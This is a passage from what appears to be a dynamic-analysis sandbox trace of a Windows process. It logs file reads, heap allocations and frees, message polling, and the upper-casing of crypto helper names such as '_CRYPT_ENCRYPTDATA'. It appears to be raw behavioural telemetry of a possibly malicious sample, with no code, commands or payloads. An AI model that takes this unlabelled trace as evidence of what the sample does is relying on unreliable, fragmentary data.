lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ea78*=0xc499, lpOverlapped=0x0) returned 1 [0113.593] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ea78*=0x0, lpOverlapped=0x0) returned 1 [0113.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0113.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0113.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0113.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0113.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc499) returned 0x4516010 [0113.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e02020 | out: hHeap=0x1780000) returned 1 [0113.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0113.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0113.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0113.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0113.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0113.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc499) returned 0x45224b8 [0113.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0113.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0113.598] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0113.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0113.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0113.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0113.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0113.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc499) returned 0x4516010 [0113.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0113.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0113.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0113.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0113.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0113.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0113.599] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0113.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0113.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0113.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0113.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0113.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0113.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0113.599] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0113.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0113.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0113.599] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0113.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0113.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0113.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0113.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2900 [0113.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0113.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0113.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0113.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0113.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc499) returned 0x4516010 [0113.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0113.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2740 [0113.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0113.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0113.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0113.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2840 [0113.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0113.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0113.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0113.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2880 [0113.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0113.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0113.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0113.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca838 [0113.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0113.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0113.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0113.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0113.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0113.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc499) returned 0x452e960 [0113.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0113.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0113.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0113.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0113.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0113.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0113.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0113.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0113.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0113.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0113.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0113.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0113.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0113.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0113.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0113.602] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0113.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0113.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0113.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0113.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0113.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0113.602] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0113.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0113.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0113.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0113.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0113.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0113.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0113.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0113.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0113.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0113.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0113.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0113.602] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0113.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0113.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0113.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0113.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2780 [0113.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0113.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0113.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0113.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0113.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa60 [0113.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0113.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0113.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0113.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0113.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0113.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0113.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0113.603] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0113.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0113.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0113.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0113.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0113.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0113.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0113.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0113.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0113.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0113.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0113.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0113.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0113.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0113.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0113.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0113.603] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0113.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0113.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0113.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0113.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0113.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0113.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0113.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0113.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0113.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0113.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0113.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0113.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0113.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0113.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0113.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0113.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0113.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0113.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0113.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0113.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0113.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0113.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0113.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0113.604] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0113.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0113.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0113.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0113.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0113.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0113.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0113.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0113.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0113.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0113.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0113.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0113.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0113.605] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0113.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0113.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9d0 [0113.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0113.605] PeekMessageW (in: lpMsg=0x144dd94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dd94) returned 0 [0113.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0113.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0113.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0113.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0113.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0113.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0113.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0113.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0113.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0113.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0113.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0113.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0113.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0113.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0113.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0113.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0113.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0113.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0113.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0113.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0113.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0113.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0113.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0113.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0113.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0113.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0113.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0113.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0113.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0113.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0113.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0113.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0113.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0113.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0113.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0113.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0113.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0113.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0113.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0113.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0113.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0113.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0113.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0113.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0113.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0113.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0113.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0113.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0113.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0113.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0113.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0113.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e08 [0113.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0113.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0113.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0113.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0113.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0113.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0113.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0113.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0113.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0113.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0113.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0113.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 